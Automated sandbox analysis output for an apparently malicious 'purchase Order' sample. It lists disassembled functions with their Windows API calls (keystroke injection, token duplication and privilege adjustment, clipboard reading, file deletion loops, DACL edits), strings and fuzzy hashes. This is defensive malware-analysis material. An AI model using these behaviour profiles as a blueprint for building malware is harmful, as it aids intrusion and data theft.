FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CB3AEA
IsIconic.USER32(000000FF), ref: 00CB3AF3
ShowWindow.USER32(000000FF,00000009), ref: 00CB3B00
SetForegroundWindow.USER32(000000FF), ref: 00CB3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CB3B20
GetCurrentThreadId.KERNEL32 ref: 00CB3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00CB3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CB3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CB3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00CB3B54
SetForegroundWindow.USER32(000000FF), ref: 00CB3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B6C
keybd_event.USER32(00000012,00000000), ref: 00CB3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B81
keybd_event.USER32(00000012,00000000), ref: 00CB3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B8F
keybd_event.USER32(00000012,00000000), ref: 00CB3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00CB3B9E
keybd_event.USER32(00000012,00000000), ref: 00CB3BA3
SetForegroundWindow.USER32(000000FF), ref: 00CB3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00CB3BCD

Strings

Shell_TrayWnd, xrefs: 00CB3AE5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 483c63d0952e297d8d8866631278b53824d49c24844033028d8413fcbfb2ab01
Instruction ID: 5f2950efdc63e530408cca2ff0ceea042ad1b4c68eb17384a4c5c0441bc0cfae
Opcode Fuzzy Hash: 483c63d0952e297d8d8866631278b53824d49c24844033028d8413fcbfb2ab01
Instruction Fuzzy Hash: 1A3167B1A403187BEB215FA5DC49FBF7E6CEB84B50F114026FA05EA1D1D6B15E01EAA0

Function 00C7ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00C7B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7B180
Part of subcall function 00C7B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C7B1AD
Part of subcall function 00C7B134: GetLastError.KERNEL32 ref: 00C7B1BA

_memset.LIBCMT ref: 00C7AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C7AD5A
CloseHandle.KERNEL32(?), ref: 00C7AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C7AD82
GetProcessWindowStation.USER32 ref: 00C7AD9B
SetProcessWindowStation.USER32(00000000), ref: 00C7ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C7ADBF

Part of subcall function 00C7AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C7ACC0), ref: 00C7AB99
Part of subcall function 00C7AB84: CloseHandle.KERNEL32(?,?,00C7ACC0), ref: 00C7ABAB

Strings

winsta0, xrefs: 00C7AD7D
, xrefs: 00C7AD17
default, xrefs: 00C7ADBA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 109a14e4a9c97c597c7a9c9ab1ce48705da66d7af7d332f24dfb694772cc7a62
Instruction ID: 1b38fb63cb361e6c0b21fd547f92ab5a4fa22d46f40025de285a6652d57e4e97
Opcode Fuzzy Hash: 109a14e4a9c97c597c7a9c9ab1ce48705da66d7af7d332f24dfb694772cc7a62
Instruction Fuzzy Hash: 28817B71900209AFDF119FA4CC49EEEBBB9EF48304F148129F929A61A1D7318E55DB62

Function 00C860DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C85FA6,?), ref: 00C86ED8

Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C85FA6,?), ref: 00C86EF1

Part of subcall function 00C8725E: __wsplitpath.LIBCMT ref: 00C8727B
Part of subcall function 00C8725E: __wsplitpath.LIBCMT ref: 00C8728E

Part of subcall function 00C872CB: GetFileAttributesW.KERNEL32(?,00C86019), ref: 00C872CC

_wcscat.LIBCMT ref: 00C86149
_wcscat.LIBCMT ref: 00C86167
__wsplitpath.LIBCMT ref: 00C8618E
FindFirstFileW.KERNEL32(?,?), ref: 00C861A4
_wcscpy.LIBCMT ref: 00C86209
_wcscat.LIBCMT ref: 00C8621C
_wcscat.LIBCMT ref: 00C8622F
lstrcmpiW.KERNEL32(?,?), ref: 00C8625D
DeleteFileW.KERNEL32(?), ref: 00C8626E
MoveFileW.KERNEL32(?,?), ref: 00C86289
MoveFileW.KERNEL32(?,?), ref: 00C86298
CopyFileW.KERNEL32(?,?,00000000), ref: 00C862AD
DeleteFileW.KERNEL32(?), ref: 00C862BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C862E1
FindClose.KERNEL32(00000000), ref: 00C862FD
FindClose.KERNEL32(00000000), ref: 00C8630B

Strings

\*.*, xrefs: 00C86138, 00C86147, 00C86165

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: a5fcfe5efa608a8aaaf8d9c638410a963cd2be9302ab42de2733b8a9b02ee9ed
Instruction ID: d3a2fe3bb73ca1a3835be50420929c1d6686930d81c4c7aa49f62c549bb30bf7
Opcode Fuzzy Hash: a5fcfe5efa608a8aaaf8d9c638410a963cd2be9302ab42de2733b8a9b02ee9ed
Instruction Fuzzy Hash: 3951247280811C6ACB21FB91CC45EDF77BCAF05314F0901EAE595E3141DE3697499FA9

Function 00C96B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00CDDC00), ref: 00C96B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C96B44
GetClipboardData.USER32(0000000D), ref: 00C96B4C
CloseClipboard.USER32 ref: 00C96B58
GlobalLock.KERNEL32(00000000), ref: 00C96B74
CloseClipboard.USER32 ref: 00C96B7E
GlobalUnlock.KERNEL32(00000000), ref: 00C96B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00C96BA0
GetClipboardData.USER32(00000001), ref: 00C96BA8
GlobalLock.KERNEL32(00000000), ref: 00C96BB5
GlobalUnlock.KERNEL32(00000000), ref: 00C96BE9
CloseClipboard.USER32 ref: 00C96CF6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: ea20b0293e1fa498c06693737dd54638320befa6c2b187323d9db3f6d542180c
Instruction ID: a642db2292b4e0213cfc19b881da51ba389e4d2a40bb16a2588eff6958885f30
Opcode Fuzzy Hash: ea20b0293e1fa498c06693737dd54638320befa6c2b187323d9db3f6d542180c
Instruction Fuzzy Hash: B0516971200301ABD700AF64DD9AF6E77A8EF94B01F004429F696D62E1EF70D905EA62

Function 00C8F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C8F62B
FindClose.KERNEL32(00000000), ref: 00C8F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C8F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C8F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C8F6E2
__swprintf.LIBCMT ref: 00C8F72E
__swprintf.LIBCMT ref: 00C8F767
__swprintf.LIBCMT ref: 00C8F7BB

Part of subcall function 00C6172B: __woutput_l.LIBCMT ref: 00C61784

__swprintf.LIBCMT ref: 00C8F809
__swprintf.LIBCMT ref: 00C8F858
__swprintf.LIBCMT ref: 00C8F8A7
__swprintf.LIBCMT ref: 00C8F8F6

Strings

%02d, xrefs: 00C8F7B0, 00C8F7B9, 00C8F807, 00C8F856, 00C8F8A5, 00C8F8F4
%4d%02d%02d%02d%02d%02d, xrefs: 00C8F728
%4d, xrefs: 00C8F761

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 3c31a6220f9044a6eb4460801219a700e327d60208db9ee943821e5ba0f5f0d6
Instruction ID: 783a064990c30d0c62797d044ef092cdbdd9b9d7f2d65b944fc045e3a8e16436
Opcode Fuzzy Hash: 3c31a6220f9044a6eb4460801219a700e327d60208db9ee943821e5ba0f5f0d6
Instruction Fuzzy Hash: D0A110B2408344ABC350EB95C885DAFB7ECFF98705F44092EF995C2152EB34EA49D762

Function 00C91B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C91B50
_wcscmp.LIBCMT ref: 00C91B65
_wcscmp.LIBCMT ref: 00C91B7C
GetFileAttributesW.KERNEL32(?), ref: 00C91B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00C91BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00C91BC0
FindClose.KERNEL32(00000000), ref: 00C91BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00C91BE7
_wcscmp.LIBCMT ref: 00C91C0E
_wcscmp.LIBCMT ref: 00C91C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00C91C37
SetCurrentDirectoryW.KERNEL32(00CF39FC), ref: 00C91C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C91C5F
FindClose.KERNEL32(00000000), ref: 00C91C6C
FindClose.KERNEL32(00000000), ref: 00C91C7C

Strings

*.*, xrefs: 00C91BE2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 5653cd2d459fa0608f800f2d9d000436e818510dd01329beccdc2dd5985d737f
Instruction ID: 26fa920a1ad060db0f0df746c0559e73840a9225a7f419dd25681dc74d058e2e
Opcode Fuzzy Hash: 5653cd2d459fa0608f800f2d9d000436e818510dd01329beccdc2dd5985d737f
Instruction Fuzzy Hash: DA31927254021A7BDF20AFB4DC4EFEE77AC9F05320F1841A6ED16E2190EB70DB458A64

Function 00C91C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C91CAB
_wcscmp.LIBCMT ref: 00C91CC0
_wcscmp.LIBCMT ref: 00C91CD7

Part of subcall function 00C86BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C86BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00C91D06
FindClose.KERNEL32(00000000), ref: 00C91D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00C91D2D
_wcscmp.LIBCMT ref: 00C91D54
_wcscmp.LIBCMT ref: 00C91D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00C91D7D
SetCurrentDirectoryW.KERNEL32(00CF39FC), ref: 00C91D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C91DA5
FindClose.KERNEL32(00000000), ref: 00C91DB2
FindClose.KERNEL32(00000000), ref: 00C91DC2

Strings

*.*, xrefs: 00C91D28

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: ef08e86b4efa3719330d46f8a97b02103a4c9367db8bbb5d2e42bd74471cadeb
Instruction ID: da48fb5817902637ee97d12882c285bfdb6194a8a5ed23885dc3d4d2d89f3a72
Opcode Fuzzy Hash: ef08e86b4efa3719330d46f8a97b02103a4c9367db8bbb5d2e42bd74471cadeb
Instruction Fuzzy Hash: E131D43250061A7ADF11EFA0DC4EFEE77AC9F45324F180565ED22A2190DB70DF458A64

Function 00C47D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C47DBD

Strings

\b(?<=\w), xrefs: 00CBF877
[:>:]], xrefs: 00C47D37
\, xrefs: 00C47D89
Q\E, xrefs: 00C486D6
\b(?=\w), xrefs: 00CBF85E
\, xrefs: 00CBF95B
], xrefs: 00C47D9F
[:<:]], xrefs: 00C47D1D
[, xrefs: 00C47E14
\, xrefs: 00C47E1D
^, xrefs: 00C47D96

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: b1983cda075d1aeafb28ff3af23a6f4272b1aa7887084bb6be0ae0dc645ca650
Instruction ID: ff62a8c3d7aa7890b2332ed87fc809e1c77be62d967a351cac8dc9ffef38ab90
Opcode Fuzzy Hash: b1983cda075d1aeafb28ff3af23a6f4272b1aa7887084bb6be0ae0dc645ca650
Instruction Fuzzy Hash: A8829E71D04219CFDB24CF98C8807EDBBB1BF44314F25826AD869AB391E7749E85DB90

Function 00C9091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C909DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C909EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C909FB
__wsplitpath.LIBCMT ref: 00C90A59
_wcscat.LIBCMT ref: 00C90A71
_wcscat.LIBCMT ref: 00C90A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C90A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00C90AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00C90ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00C90AFF
_wcscpy.LIBCMT ref: 00C90B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C90B4A

Strings

*.*, xrefs: 00C90B05

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 3b33b38fc4909ad4a994db3fd5a5e83f2ba8bd483c63a98a1c782123c91459af
Instruction ID: d808a622736b903b87c7b60245a8b57297ea58d24bde18956fbb5273d4aa55bc
Opcode Fuzzy Hash: 3b33b38fc4909ad4a994db3fd5a5e83f2ba8bd483c63a98a1c782123c91459af
Instruction Fuzzy Hash: 56616D725043059FDB10EF60C885A9EB3E8FF89314F14496EF99AC7252DB31EA45CB92

Function 00C7A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C7ABD7
Part of subcall function 00C7ABBB: GetLastError.KERNEL32(?,00C7A69F,?,?,?), ref: 00C7ABE1
Part of subcall function 00C7ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00C7A69F,?,?,?), ref: 00C7ABF0
Part of subcall function 00C7ABBB: HeapAlloc.KERNEL32(00000000,?,00C7A69F,?,?,?), ref: 00C7ABF7
Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C7AC0E

Part of subcall function 00C7AC56: GetProcessHeap.KERNEL32(00000008,00C7A6B5,00000000,00000000,?,00C7A6B5,?), ref: 00C7AC62
Part of subcall function 00C7AC56: HeapAlloc.KERNEL32(00000000,?,00C7A6B5,?), ref: 00C7AC69
Part of subcall function 00C7AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C7A6B5,?), ref: 00C7AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C7A6D0
_memset.LIBCMT ref: 00C7A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C7A704
GetLengthSid.ADVAPI32(?), ref: 00C7A715
GetAce.ADVAPI32(?,00000000,?), ref: 00C7A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C7A76E
GetLengthSid.ADVAPI32(?), ref: 00C7A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C7A79A
HeapAlloc.KERNEL32(00000000), ref: 00C7A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C7A7C2
CopySid.ADVAPI32(00000000), ref: 00C7A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C7A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C7A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C7A834

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 45b07f0b35850248fb55d3a1c18dfa9f6f01be9d52d6670daaec6fdb0f3de61f
Instruction ID: 9b99e84aed633f86c3f0e7d62c8fb286a73497628f677bb496c605c0bd4255df
Opcode Fuzzy Hash: 45b07f0b35850248fb55d3a1c18dfa9f6f01be9d52d6670daaec6fdb0f3de61f
Instruction Fuzzy Hash: 2A514A71900209AFDF14DFA5DC45EEEBBB9FF44300F048129F929A7290DB359A06DB61

Function 00C46F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

CRLF), xrefs: 00CC2E43
ANYCRLF), xrefs: 00CC2E7D
UCP), xrefs: 00CC2C8F
ANY), xrefs: 00CC2E60
UTF), xrefs: 00CC2C7C
LIMIT_RECURSION=, xrefs: 00CC2D7E
NO_AUTO_POSSESS), xrefs: 00CC2CB0
BSR_UNICODE), xrefs: 00CC2EBA
NO_START_OPT), xrefs: 00CC2CD1
CR), xrefs: 00CC2E09
LF), xrefs: 00CC2E26
BSR_ANYCRLF), xrefs: 00CC2EA0
LIMIT_MATCH=, xrefs: 00CC2CF2
UTF16), xrefs: 00CC2C56

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 0a8ebed856de77251e4da0f1d5ce0fa17afae5d97331915ab2ee4d5f33143134
Instruction ID: 70c4e2a72de8877c880b5eb3f4a930c23c0d3a09158b1a39db479690add26980
Opcode Fuzzy Hash: 0a8ebed856de77251e4da0f1d5ce0fa17afae5d97331915ab2ee4d5f33143134
Instruction Fuzzy Hash: 72726E71E042199BDF24CF99D880BBEB7B5BF48310F14816EE915EB284DB709E81DB91

Function 00C863F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C85FA6,?), ref: 00C86ED8

Part of subcall function 00C872CB: GetFileAttributesW.KERNEL32(?,00C86019), ref: 00C872CC

_wcscat.LIBCMT ref: 00C86441
__wsplitpath.LIBCMT ref: 00C8645F
FindFirstFileW.KERNEL32(?,?), ref: 00C86474
_wcscpy.LIBCMT ref: 00C864A3
_wcscat.LIBCMT ref: 00C864B8
_wcscat.LIBCMT ref: 00C864CA
DeleteFileW.KERNEL32(?), ref: 00C864DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C864EB
FindClose.KERNEL32(00000000), ref: 00C86506

Strings

\*.*, xrefs: 00C8643B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 76a616cf4a1190fc3c7e85f1214ec0a508dbec96f0cb7631368ad0c4c4eae28c
Instruction ID: c8ab96d882964abbd0a034a1d62d2738b46561affdbd43b0884214c223cf204f
Opcode Fuzzy Hash: 76a616cf4a1190fc3c7e85f1214ec0a508dbec96f0cb7631368ad0c4c4eae28c
Instruction Fuzzy Hash: 133184B2408384AAC731EBA4C885EDFB7DCAF95314F44092EF6D9C3141EA35D6099767

Function 00CA31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

